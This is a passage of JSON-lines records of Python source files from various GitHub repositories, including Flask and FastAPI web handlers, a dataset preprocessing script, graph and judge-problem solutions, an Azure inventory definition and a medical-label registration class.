values\r\n ax.plot(historical_data.index[-365:], historical_data[\"Close\"].iloc[-365:], label='Actual')\r\n ax.plot(forecast_date, actual_forecast, 'ro', markersize=8, alpha=0.5, label='Forecast')\r\n\r\n # Add legend and grid lines\r\n ax.legend()\r\n ax.grid(True)\r\n\r\n # Save the plot to a BytesIO object\r\n buffer = BytesIO()\r\n plt.savefig(buffer, format=\"png\", bbox_inches='tight', dpi=300)\r\n buffer.seek(0)\r\n\r\n # Encode the plot image to base64\r\n plot_image = base64.b64encode(buffer.getvalue()).decode(\"utf-8\")\r\n\r\n plt.close()\r\n\r\n # Create response with the rendered template\r\n response = make_response(render_template(\r\n \"output.html\",\r\n ticker=ticker.upper(),\r\n sector=sector,\r\n country=country,\r\n website=website,\r\n summary=summary,\r\n min_date=min_date,\r\n max_date=max_date,\r\n forecast_date=forecast_date,\r\n forecast=actual_forecast,\r\n bound=bound,\r\n plot_image=plot_image\r\n ))\r\n\r\n # Add necessary headers for the image\r\n response.headers['Content-Type'] = 'text/html'\r\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\r\n response.headers['Pragma'] = 'no-cache'\r\n response.headers['Expires'] = '0'\r\n\r\n return response\r\n","repo_name":"ShreyasNatu/BE_Final_Project","sub_path":"share_sensei/src/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40399497279","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom collections import Counter\n\nimport sentencepiece as spm\nimport torch\n\nfrom ncc_dataset.clcdsa import (\n MODES,\n)\nfrom ncc_dataset.clcdsa.plbart import (\n SPM_VOCAB_FILE,\n)\nfrom ncc import LOGGER\nfrom ncc.data.dictionary import (\n Dictionary,\n)\nfrom ncc.tokenizers.tokenization import SPACE_SPLITTER\nfrom ncc.utils.file_ops import file_io\nfrom ncc.utils.file_ops import json_io\nfrom ncc.utils.file_ops.yaml_io import load_yaml\nfrom ncc.utils.path_manager import PathManager\nfrom ncc.data import indexed_dataset\n\n\ndef main(args):\n LOGGER.info('mkdir {} for {} task'.format(args['preprocess']['destdir'], args['preprocess']['task']))\n PathManager.mkdir(args['preprocess']['destdir'])\n vocab = spm.SentencePieceProcessor()\n vocab.load(SPM_VOCAB_FILE)\n\n def save_dict():\n src_file = os.path.join(os.path.dirname(SPM_VOCAB_FILE), 'dict.txt')\n tgt_file = os.path.join(args['preprocess']['destdir'], 'dict.jsonl')\n # Dictionary.text_to_jsonl(src_file, tgt_file)\n vocab = Dictionary()\n with file_io.open(src_file, 'r') as reader:\n for line in reader:\n token, num = line.strip().split()\n vocab.add_symbol(token, eval(num))\n vocab.save(tgt_file)\n return vocab\n\n dictionary = save_dict()\n\n # 2. ***************build dataset********************\n # dump into pkl file\n # transform a language's code into src format and tgt format simualtaneouly\n lang = args['preprocess']['lang']\n for mode in MODES:\n file = f\"{args['preprocess'][f'{mode}pref']}.code\"\n dst_file = os.path.join(args['preprocess']['destdir'], lang, f\"{mode}.code\")\n PathManager.mkdir(os.path.dirname(dst_file))\n dataset = indexed_dataset.make_builder(f\"{dst_file}_tokens.mmap\", impl='mmap', vocab_size=len(vocab))\n PathManager.mkdir(os.path.dirname(dst_file))\n with file_io.open(file, 'r') as reader:\n data = {'code': []}\n for line in reader:\n line = json_io.json_loads(line)\n code = SPACE_SPLITTER.sub(\" \", line)\n data['code'].append(code)\n code_tokens = vocab.encode(code, out_type=str)\n code_tokens = torch.IntTensor([dictionary.index(token) for token in code_tokens])\n # code_tokens = torch.IntTensor(vocab.encode_as_ids(code))\n dataset.add_item(code_tokens)\n dataset.finalize(f\"{dst_file}_tokens.idx\")\n # proj indices\n # cp id\n data['proj_indices'] = [1] * len(data['code'])\n file_io.open(f\"{dst_file}.pkl\", mode='wb', data=data)\n\n\ndef cli_main():\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Downloading/Decompressing CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--yaml_file\", \"-f\", type=str, help=\"load {yaml_file}.yml for train\",\n )\n args = parser.parse_args()\n yaml_file = os.path.join(os.path.dirname(__file__), f\"{args.yaml_file}.yml\")\n LOGGER.info('Load arguments in {}'.format(yaml_file))\n args = load_yaml(yaml_file)\n LOGGER.info(args)\n main(args)\n\n\nif __name__ == \"__main__\":\n cli_main()\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc_dataset/codexglue/code_to_code/retrieval/plbart/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"5181699863","text":"# Works with undirected connected graphs\n\ntime = 1\n\n\ndef dfs_bridges(G, vertex, visited, parents, lows, times):\n global time\n visited[vertex] = True\n times[vertex] = time\n time += 1\n lows[vertex] = times[vertex]\n\n for neighbor in G[vertex]:\n if not visited[neighbor]:\n parents[neighbor] = vertex\n dfs_bridges(G, neighbor, visited, parents, lows, times)\n\n if lows[neighbor] < lows[vertex] and parents[vertex] != neighbor:\n lows[vertex] = lows[neighbor]\n\n return times, lows\n\n\ndef main():\n # G = [[1, 2, 3], [0, 2], [0, 1, 3], [0, 2], [5], [4], [7, 9], [6, 8], [7], [6, 10], [9, 11], [10]]\n # G = [[1], [2], [0, 3], [4], [5, 8], [6, 10], [3], [8], [10], [8], [7, 9]]\n G = [[1], [0, 2, 4], [1, 3], [2, 4], [1, 3, 5], [4, 6, 7], [5, 7], [5, 6]]\n visited = [False] * len(G)\n parents = [None] * len(G)\n lows = [None] * len(G)\n times = [None] * len(G)\n\n print(dfs_bridges(G, 2, visited, parents, lows, times))\n\n bridges = []\n for i in range(len(G)):\n tmp = []\n if times[i] == lows[i] and parents[i] is not None:\n tmp.append(i)\n tmp.append(parents[i])\n bridges.append(tmp)\n\n print(bridges)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"youngbucu/Studia","sub_path":"ASD/grafy/DFS/dfs_bridges_A.py","file_name":"dfs_bridges_A.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20181075403","text":"import sys\nimport pygame\n\npygame.init()\nwindow = pygame.display.set_mode((640, 480))\nclock = pygame.time.Clock()\n\ndef keyboard_handler(events):\n for event in events:\n if event.type == pygame.KEYDOWN:\n do_something()\n\nwhile True:\n events = pygame.events.get()\n for event in events:\n if event.type == pygame.QUIT:\n sys.exit()\n\n keyboard_handler(events)\n\n window.fill((0, 0, 0))\n pygame.display.flip()\n clock.tick(30)\n","repo_name":"bydariogamer/py101forpygamers","sub_path":"source/tipsandtricks/sourcecode/nestedloops_right.py","file_name":"nestedloops_right.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20451151301","text":"from fastapi import Request\nfrom fastapi.routing import APIRouter\nfrom loopquest import schema\nfrom datetime import datetime\nfrom .crud import *\nfrom shortuuid import ShortUUID\n\nALPHABET = \"0123456789abcdefghijklmnopqrstuvwxyz\"\ngen_short_uuid = lambda: ShortUUID(alphabet=ALPHABET).random(length=8)\n\napi_router = APIRouter(\n prefix=\"/exp\",\n tags=[\"Experiment\"],\n)\n\n\n@api_router.post(\"\", response_model=schema.Experiment)\nasync def create_experiment(request: Request, experiment: schema.ExperimentCreate):\n while True:\n try:\n short_uuid = gen_short_uuid()\n env = schema.Experiment(\n **experiment.model_dump(),\n id=short_uuid,\n creation_time=datetime.now(),\n update_time=datetime.now()\n )\n return await db_create_experiment(request.app.db, env)\n except HTTPException as e:\n if e.status_code == 409:\n continue\n else:\n raise e\n\n\n@api_router.get(\"/all\", response_model=list[schema.Experiment])\nasync def get_all_experiments(request: Request):\n exps = await db_get_all_experiments(request.app.db)\n return exps\n\n\n@api_router.get(\"/{id}\", response_model=schema.Experiment)\nasync def read_experiment(request: Request, id: str):\n env = await db_get_experiment(request.app.db, id)\n return env\n\n\n@api_router.put(\"/{id}\", response_model=schema.Experiment)\nasync def update_experiment(\n request: Request, id: str, experiment: schema.ExperimentUpdate\n):\n env = await db_update_experiment(request.app.db, id, experiment)\n return env\n\n\n@api_router.delete(\"/{id}\")\nasync def delete_experiment(request: Request, id: str):\n await db_delete_experiment(request.app.db, id)\n return {\"message\": \"Experiment deleted successfully\"}\n\n\n@api_router.get(\"/user/{user_id}/env/{env_id}\", response_model=list[schema.Experiment])\nasync def get_experiment_by_user_env(request: Request, user_id: str, env_id: str):\n exps = await db_get_experiment_by_user_env(request.app.db, user_id, env_id)\n return exps\n\n\n@api_router.get(\"/user/{user_id}\", response_model=list[schema.Experiment])\nasync def get_experiment_by_user(request: Request, user_id: str):\n exps = await db_get_experiment_by_user(request.app.db, user_id)\n return exps\n","repo_name":"LoopMind-AI/loopquest","sub_path":"backend/src/apps/experiment/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"1129325189","text":"n = int(input()) # 输入好友个数\ndata = input()\nlist = data.split(' ') # 将好友编号分开\nw = [] # 记录好友编号\nv = [] # 记录是否追踪过\nflag = 0 # 小群体个数\nw = [int(x) for x in list] # 将输入的字串变整数\nfor i in range(n):\n v.append(0) # 一开始都没追踪,设为0\n\nfor j in range(n):\n if v[j] == 0: # 从没追踪的开始追踪,追踪过的变为1\n if w[j] == j: # 自己是自己的好友,算一个小群体\n flag += 1 # 小群体直接加1\n v[j] = 1 # 追踪过的变为1\n else: # 有其它人为好友\n nextone = j # 用nextone来当暂存数\n while v[nextone] == 0: # 当没拜访过就继续拜访\n v[nextone] = 1 # 拜访过的变为1\n nextone = w[nextone] # 一直循环到成一小群体\n flag += 1 # 成一小群体加1\n\nprint(flag) # 印出小群体个数","repo_name":"jasontaichi/jasonpython","sub_path":"EX7.py","file_name":"EX7.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70361765289","text":"import unittest\nimport numpy as np\nfrom skimage import io\nimport SimpleITK as sitk\nfrom skimage import measure\nimport torch\n\n\ndef auto_change_dtype(arr):\n # TODO 性能优化\n if arr.min() < 0:\n return arr.astype('int16')\n else:\n return arr.astype('uint16')\n\n\nclass LabelRegister:\n \"\"\"\n 标签配准,主要用于人工定义的分区映射到分割好的器官上,通过手工绘制区域设定分区\n \"\"\"\n\n def __init__(self):\n self._region_model = None\n\n def bounding_rectangle(self, image):\n \"\"\"\n 设置外接矩形\n :param image:\n :return:\n \"\"\"\n label_arr = image\n label_arr[label_arr > 1] = 1\n label_arr[label_arr < 1] = 0\n label_arr.astype(np.uint8)\n region_properties = measure.regionprops(label_arr)\n # 这里界定似乎有些模糊\n arr_centroid = region_properties[0].centroid\n arr_centroid = [round(arr_centroid[0]), round(arr_centroid[1]), round(arr_centroid[2])]\n return arr_centroid\n\n def label_binary_array_resize_4d(self, labels, target_shape):\n \"\"\"\n 用于二值化标签缩放,返回整形\n 此函数经常被标签缩放调用,类似临近差值,但是不能处理多个不同值的标签,多个标签用image_array_resize_4d(imgs, target_shape, mode='nearest')\n :param labels: (c,z,y,x) 二值化数组,0-1\n :param target_shape: (z,y,x)\n :return: 二值化数组,(c,z,y,x)\n \"\"\"\n labels[labels > 1] = 1\n # assert labels.max() <= 1 and labels.min() >= 0, '暂不支持标签的值含有除0和1以外的值'\n float_labels = self.image_array_resize_4d(labels, target_shape)\n float_labels[float_labels > 0.5] = 1 # float_imgs += 0.49 # 避免标签大面积缺失问题\n int_imgs = float_labels.astype('uint8')\n return int_imgs\n\n def label_array_resize_3d(self, label_arr, target_shape):\n \"\"\"\n 3维度标签缩放,支持多个数值的标签\n 主要原理是把3维度标签按每个值拆分(np.unique(arr)可以查看数组有什么值),组成4维数组,调用label_binary_array_resize_4d,再将生成的4维度数组合并为3维度数组\n :param label_arr: (z,y,x) 3维数组,整型\n :param target_shape: (z,y,x)\n :return: (z,y,x) 3维数组,dtype为np.int16\n \"\"\"\n label_arr = np.array([label_arr])\n res_arr = self.label_binary_array_resize_4d(label_arr, target_shape)[0]\n return res_arr\n\n def image_array_resize_4d(self, imgs, target_shape, mode='trilinear'):\n \"\"\"\n 用于dicom或者nii图像缩放,注意返回浮点型,需要按需处理为整型\n :param imgs: (c,z,y,x)\n :param target_shape: (z,y,x)\n :param mode: (string): algorithm used for upsampling:\n 'nearest' | 'linear' | 'bilinear' | 'trilinear' | 'area'.特别注意直接用nearest会发生标签偏移的问题\n :return:浮点型,(c,z,y,x)\n \"\"\"\n imgs = imgs[np.newaxis].astype(np.float)\n imgs = torch.from_numpy(imgs)\n # print(imgs)\n # https://www.cnblogs.com/wanghui-garcia/p/11399034.html\n # 这里必须ValueError: align_corners option can only be set with the interpolating modes: linear | bilinear | trilinear\n imgs = torch.nn.functional.interpolate(imgs, size=target_shape, mode=mode) # align_corners=True没啥区别\n float_imgs = imgs.numpy()[0]\n # int_imgs = float_imgs.astype('uint8')\n return float_imgs\n\n def set_region_model(self, itk_image):\n \"\"\"\n 设置标注好的分区的label,每个区域用不同的数值表示\n :param itk_image: sitk.Image 对象\n :return:\n \"\"\"\n self._region_model = itk_image\n\n def set_model_directon(self, model_image, region_image):\n \"\"\"\n 获得方向一致的模型\n :param itk_image:\n :return:\n \"\"\"\n model_image = sitk.ReadImage(model_image)\n itk_image = sitk.ReadImage(region_image)\n # 调整region_model方向\n resampler = sitk.ResampleImageFilter()\n resampler.SetOutputOrigin(itk_image.GetOrigin())\n resampler.SetOutputSpacing(itk_image.GetSpacing())\n resampler.SetSize(itk_image.GetSize())\n resampler.SetOutputDirection(itk_image.GetDirection())\n new_region_model = resampler.Execute(model_image)\n return new_region_model\n\n def set_model_shape(self, model_new_arr, region_arr):\n \"\"\"\n 获得模型形状\n :param model_new_arr:\n :param region_arr:\n :return:\n \"\"\"\n transform_arr = self.label_array_resize_3d(model_new_arr,\n (region_arr.shape[0], region_arr.shape[1], region_arr.shape[2]))\n return transform_arr\n\n def get_after_mapping_image(self, transform_arr, region_arr):\n \"\"\"\n 用最大交集映射图片的区域\n :param max_intersection_arr:\n :param itk_image_arr:\n :return:\n \"\"\"\n res_index_list = []\n after_mapping_arr = np.zeros((region_arr.shape[0], region_arr.shape[1], region_arr.shape[2]))\n for z in range(transform_arr.shape[0]):\n for x in range(transform_arr.shape[2]):\n for y in range(transform_arr.shape[1]):\n if transform_arr[z][y][x] == 1:\n res_index_list.append([z, y, x])\n for i in res_index_list:\n if region_arr[i[0]][i[1]][i[2]]:\n after_mapping_arr[i[0]][i[1]][i[2]] = region_arr[i[0]][i[1]][i[2]]\n itk_image = sitk.GetImageFromArray(region_arr)\n image_obj = sitk.GetImageFromArray(after_mapping_arr)\n image_obj.SetSpacing(itk_image.GetSpacing())\n image_obj.SetOrigin(itk_image.GetOrigin())\n image_obj.SetDirection(itk_image.GetDirection())\n # sitk.WriteImage(image_obj, 'res.nii.gz')\n return image_obj\n\n def rigid_registration(self, itk_image):\n \"\"\"\n 标签刚性配准,将大体的器官映射到region_model对应的区域上\n 第一步:将region_model方向调整到与itk_image一致\n resampler = sitk.ResampleImageFilter()\n resampler.SetOutputDirection(itk_image.GetDirection())\n new_region_model = resampler.Execute(self._region_model)\n 第二步:通过缩放,移动等操作,调整region_model的大小位置,使得两者外接矩形基本重合\n 外接矩形参考batch_command\\djTubePositions.py 170-175行\n 3d图像缩放调用smartimage.transforms.utils.label_array_resize_3d,此函数需要自行完善\n 第三步: 对调整后的region_model构造sitk.Image对象,并返回\n image_obj = sitk.GetImageFromArray(image_arr)\n image_obj.SetSpacing(itk_image.GetSpacing())\n image_obj.SetOrigin(itk_image.GetOrigin())\n image_obj.SetDirection(itk_image.GetDirection())\n :param itk_image: sitk.Image 对象\n :return: sitk.Image 对象\n \"\"\"\n # 调整model方向\n new_model = self.set_model_directon(self._region_model, itk_image)\n # 将image转化为array\n itk_image = sitk.ReadImage(itk_image)\n itk = sitk.ReadImage(new_model)\n model_arr = sitk.GetArrayFromImage(itk)\n region_arr = sitk.GetArrayFromImage(itk_image)\n # 缩放\n transform_arr = self.set_model_shape(model_arr, region_arr)\n # 设置外接矩形\n transfrom_rectangle_centroid = self.bounding_rectangle(transform_arr)\n region_rectangle_centroid = self.bounding_rectangle(region_arr)\n # print(transfrom_rectangle_centroid, region_rectangle_centroid, transform_arr.shape, region_arr.shape)\n # 两矩形质点坐标差值\n move_z_num = region_rectangle_centroid[0] - transfrom_rectangle_centroid[0]\n move_y_num = region_rectangle_centroid[1] - transfrom_rectangle_centroid[1]\n move_x_num = region_rectangle_centroid[2] - transfrom_rectangle_centroid[2]\n tmp_z_arr = np.zeros((transform_arr.shape[0], transform_arr.shape[1], transform_arr.shape[2]))\n # 根据坐标差值进行移动\n if move_z_num > 0:\n tmp_z_arr[region_rectangle_centroid[0]:, :, :] = transform_arr[transfrom_rectangle_centroid[0]: transfrom_rectangle_centroid[0] + region_arr.shape[0] - region_rectangle_centroid[0], :, :]\n tmp_z_arr[region_rectangle_centroid[0] - transfrom_rectangle_centroid[0]-1:region_rectangle_centroid[0], :, :] = transform_arr[:transfrom_rectangle_centroid[0]+1, :, :]\n elif move_z_num == 0:\n tmp_z_arr = transform_arr\n else:\n tmp_z_arr[region_rectangle_centroid[0]:region_rectangle_centroid[0] + (transform_arr.shape[0] - transfrom_rectangle_centroid[0]), :, :] = transform_arr[transfrom_rectangle_centroid[0]:, :, :]\n tmp_z_arr[:region_rectangle_centroid[0]+1, :, :] = transform_arr[transfrom_rectangle_centroid[0] - region_rectangle_centroid[0]-1: transfrom_rectangle_centroid[0], :, :]\n # print(tmp_z_arr)\n tmp_y_arr = np.zeros((transform_arr.shape[0], transform_arr.shape[1], transform_arr.shape[2]))\n if move_y_num > 0:\n tmp_y_arr[:, region_rectangle_centroid[1]:, :] = tmp_z_arr[:, transfrom_rectangle_centroid[1]: transfrom_rectangle_centroid[1] + region_arr.shape[1] - region_rectangle_centroid[1], :]\n tmp_y_arr[:, region_rectangle_centroid[1] - transfrom_rectangle_centroid[1] - 1:region_rectangle_centroid[1], :] = tmp_z_arr[:, :transfrom_rectangle_centroid[1] +1, :]\n elif move_y_num == 0:\n tmp_y_arr = tmp_z_arr\n else:\n tmp_y_arr[:, region_rectangle_centroid[1]:region_rectangle_centroid[1] + (transform_arr.shape[1] - transfrom_rectangle_centroid[1]), :] = tmp_z_arr[:, transfrom_rectangle_centroid[1]:, :]\n tmp_y_arr[:, :region_rectangle_centroid[1]+1, :] = tmp_z_arr[:, transfrom_rectangle_centroid[1] - region_rectangle_centroid[1]-1: transfrom_rectangle_centroid[1], :]\n # print(d)\n tmp_x_arr = np.zeros((transform_arr.shape[0], transform_arr.shape[1], transform_arr.shape[2]))\n if move_x_num > 0:\n tmp_x_arr[:, :, region_rectangle_centroid[2]:] = tmp_y_arr[:, :, transfrom_rectangle_centroid[2]: transfrom_rectangle_centroid[2] + region_arr.shape[2] - region_rectangle_centroid[2]]\n tmp_x_arr[:, :,\n region_rectangle_centroid[2] - transfrom_rectangle_centroid[2]-1:region_rectangle_centroid[2]] = tmp_y_arr[:, :, : transfrom_rectangle_centroid[2]+1]\n elif move_x_num == 0:\n tmp_x_arr = tmp_y_arr\n else:\n tmp_x_arr[:, :, region_rectangle_centroid[2]:region_rectangle_centroid[2] + (transform_arr.shape[2] - transfrom_rectangle_centroid[2])] = tmp_y_arr[:, :, transfrom_rectangle_centroid[2]:]\n tmp_x_arr[:, :, :region_rectangle_centroid[2]+1] = tmp_y_arr[:, :, transfrom_rectangle_centroid[2]-region_rectangle_centroid[2]-1: transfrom_rectangle_centroid[2]]\n # 获取映射后区域\n mapping_image = self.get_after_mapping_image(tmp_x_arr, region_arr)\n return mapping_image\n\n\nif __name__ == '__main__':\n # 创建对象\n model_image = 'labels__alone.nii.gz'\n itk_image = 'plabels_1__images_1.nii.gz'\n labelrigister = LabelRegister()\n labelrigister.set_region_model(model_image)\n labelrigister.rigid_registration(itk_image)\n","repo_name":"lishijia2740/batch_processing_work","sub_path":"model_region/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33007105630","text":"import os\nfrom spaceone.inventory.libs.utils import *\nfrom spaceone.inventory.libs.schema.metadata.dynamic_widget import CardWidget, ChartWidget\nfrom spaceone.inventory.libs.schema.metadata.dynamic_field import TextDyField, SearchField, DateTimeDyField, ListDyField, \\\n EnumDyField\nfrom spaceone.inventory.libs.schema.cloud_service_type import CloudServiceTypeResource, CloudServiceTypeResponse, \\\n CloudServiceTypeMeta\n\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\n\nvirtualnetwork_count_per_location_conf = os.path.join(current_dir, 'widget/virtualnetwork_count_per_location.yaml')\nvirtualnetwork_count_per_subscription_conf = os.path.join(current_dir, 'widget/virtualnetwork_count_per_subscription.yaml')\nvirtualnetwork_subnet_count_per_location_conf = os.path.join(current_dir, 'widget/virtualnetwork_subnet_count_per_location.yaml')\nvirtualnetwork_subnet_count_per_subscription_conf = os.path.join(current_dir, 'widget/virtualnetwork_subnet_count_per_subscription.yaml')\n\n\ncst_virtual_network = CloudServiceTypeResource()\ncst_virtual_network.name = 'VirtualNetwork'\ncst_virtual_network.group = 'Network'\ncst_virtual_network.service_code = 'Microsoft.Network/virtualNetworks'\ncst_virtual_network.labels = ['Network']\ncst_virtual_network.is_major = True\ncst_virtual_network.is_primary = True\ncst_virtual_network.tags = {\n 'spaceone:icon': 'https://spaceone-custom-assets.s3.ap-northeast-2.amazonaws.com/console-assets/icons/cloud-services/azure/azure-virtual-networks.svg',\n}\n\ncst_virtual_network._metadata = CloudServiceTypeMeta.set_meta(\n fields=[\n TextDyField.data_source('Name', 'name'),\n TextDyField.data_source('Resource Group', 'data.resource_group'),\n TextDyField.data_source('Location', 'data.location'),\n TextDyField.data_source('Subscription', 'data.subscription_name'),\n\n # is_optional fields - Default\n TextDyField.data_source('Resource ID', 'data.id', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Subscription ID', 'account', options={\n 'is_optional': True\n }),\n ListDyField.data_source('DNS servers', 'data.dhcp_options.dns_servers', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Resource GUID', 'data.resource_guid', options={\n 'is_optional': True\n }),\n ListDyField.data_source('Address Space', 'data.address_space.address_prefixes', options={\n 'is_optional': True\n }),\n\n # is_optional fields - Connected Devices\n TextDyField.data_source('Connected Device', 'data.connected_devices.device', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Connected Device Type', 'data.connected_devices.type', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Connected Subnet', 'data.connected_devices.name', options={\n 'is_optional': True\n }),\n\n # is_optional fields -Subnets\n TextDyField.data_source('Subnet Name', 'data.subnets.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('IP Address Prefix', 'data.subnets.address_prefix', options={\n 'is_optional': True\n }),\n ListDyField.data_source('IP Address Prefixes', 'data.subnets.address_prefixes', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Delegated To', 'data.subnets.delegations.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Security Group', 'data.subnets.network_security_group.name', options={\n 'is_optional': True\n }),\n\n # is optional fields - Firewall\n TextDyField.data_source('Firewall Name', 'data.azure_firewall.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Firewall IP Address', 'data.azure_firewall.ip_configurations.private_ip_address', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Firewall Subnet', 'data.azure_firewall.subnet', options={\n 'is_optional': True\n }),\n\n # is_optional fields - Peerings\n TextDyField.data_source('Peering Name', 'data.virtual_network_peerings.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Peer', 'data.virtual_network_peerings.remote_virtual_network.id', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Peer Gateway Transit', 'data.virtual_network_peerings.allow_gateway_transit', options={\n 'is_optional': True\n }),\n\n # is optional fields - Service Endpoints\n TextDyField.data_source('Service', 'data.service_endpoints.service', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Subnet', 'data.service_endpoints.subnet', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Locations', 'data.service_endpoints.locations', options={\n 'is_optional': True\n }),\n\n # is optional fields - Private Endpoints\n TextDyField.data_source('Private Endpoint', 'data.private_endpoints.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Private Endpoint Subnet', 'data.private_endpoints.subnet', options={\n 'is_optional': True\n })\n ],\n search=[\n SearchField.set(name='ID', key='data.id', data_type='string'),\n SearchField.set(name='Name', key='name', data_type='string'),\n SearchField.set(name='Subscription ID', key='account', data_type='string'),\n SearchField.set(name='Subscription Name', key='data.subscription_name', data_type='string'),\n SearchField.set(name='Resource Group', key='data.resource_group', data_type='string'),\n SearchField.set(name='Location', key='data.location', data_type='string'),\n ],\n widget=[\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_count_per_subscription_conf)),\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_count_per_location_conf)),\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_subnet_count_per_subscription_conf)),\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_subnet_count_per_location_conf))\n ]\n)\n\n\nCLOUD_SERVICE_TYPES = [\n CloudServiceTypeResponse({'resource': cst_virtual_network}),\n]\n","repo_name":"jean1042/plugin-azure-cloud-services","sub_path":"src/spaceone/inventory/model/virtualnetwork/cloud_service_type.py","file_name":"cloud_service_type.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71888418409","text":"# 백준 17086 아��� 상어2\n\nfrom collections import deque\n\nn, m = map(int,input().split())\narr = [list(map(int,input().split())) for _ in range(n)]\nanswer = 0\n\nbaby_shark = list()\nfor i in range(n):\n for j in range(m):\n if arr[i][j] == 1:\n baby_shark.append((i,j))\n arr[i][j] = -1\n\ndr = [1,1,1,0,-1,-1,-1,0]\ndc = [1,0,-1,-1,-1,0,1,1]\n\nfor r, c in baby_shark:\n q = deque()\n q.append((r,c,0))\n while q:\n cr, cc, cnt = q.popleft()\n for d in range(8):\n nr, nc = cr+dr[d], cc+dc[d]\n if 0 <= nr < n and 0 <= nc < m and (arr[nr][nc] > cnt+1 or not arr[nr][nc]):\n q.append((nr,nc,cnt+1))\n arr[nr][nc] = cnt + 1\n\nanswer = 0\nfor i in range(n):\n for j in range(m):\n if arr[i][j] != -1:\n answer = max(answer, arr[i][j])\n\nprint(answer)\n","repo_name":"do0134/solostudy","sub_path":"algorithm/10월/1012/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7054225039","text":"# Problem No.: 2562\n# Solver: Jinmin Goh\n# Date: 20191125\n# URL: https://www.acmicpc.net/problem/2562\n\nimport sys\n\nnum = []\nfor i in range(9):\n num.append(int(input()))\n\nprint(max(num))\nprint(num.index(max(num)) + 1)","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/02562/02562.py","file_name":"02562.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5860276613","text":"#!/usr/bin/env python3.5\n# -*- coding: utf-8 -*-\n\n__author__ = 'tangyongfeng'\nimport json\nimport datetime\nimport threading\nimport os,errno\nimport configfile\nimport zhongcaiweiyou\nimport strategytable\nimport numpy as np\nfrom poker import *\n\n\n_DEBUG_=False\n_DEEP_DEBUG_=False\n\nclass Financial:\n\tdef __init__(self):\n\t\tself.CoinBlance=0\t\n\t\tself.DiamondBlance=0\n\t\tself.startCoinBlance=0\n\t\tself.stake=0\n\t\tself.level=0\n\t\tself.round=0\n\t\tself.stage=0\n\t\tself.accountList=[]\n\t\tself.awardList=[]\n\t\tself.blanceList=[]\n\t\tself._stage_head=True\n\tdef pocketIt(self,award):\n\t\tself.CoinBlance-=self.stake\n\t\tself.CoinBlance+=award\n\tdef nextRound(self,strategy,score,award):\n\t\tresult= self.round,strategy,score,self.stake,award,self.CoinBlance\n\t\tif _DEBUG_:\n\t\t\tprint (result)\n\t\tself.accountList.append(result)\n\t\tself.awardList.append(award)\n\t\tself.blanceList.append(self.CoinBlance)\n\t\tself.round+=1\n\tdef getStage(self):\n\t\tstage_info=''\n\t\tmean=np.mean(self.awardList)\n\t\tvar=np.var(self.awardList)\n\t\tmedian=np.median(self.awardList)\n\t\tblanceMin=np.min(self.blanceList)\n\t\tblanceMax=np.max(self.blanceList)\n\t\tif self._stage_head:\n\t\t\thead='stage,mean,median,var,blanceMin,blanceMax,stake\\n'\n\t\t\tself._stage_head=False\n\t\telse:\n\t\t\thead=''\n\t\tstage_info+=head\n\t\tstage_info+='%d,%d,%d,%d,%d,%d,%d'%(self.stage,mean,median,var,blanceMin,blanceMax,self.stake)\n\t\tself.accountList=[]\n\t\tself.awardList=[]\n\t\tself.blanceList=[]\n\t\tself.stage+=1\n\t\n\t\treturn stage_info\nclass Player:\n\tdef __init__(self):\n\t\tself.uid=0\n\t\tself.appid=0\n\t\tself.fristHand=Hand()\n\t\tself.dealerhand=Hand()\n\t\tself.financial=Financial()\n\nclass Loging:\n\tdef 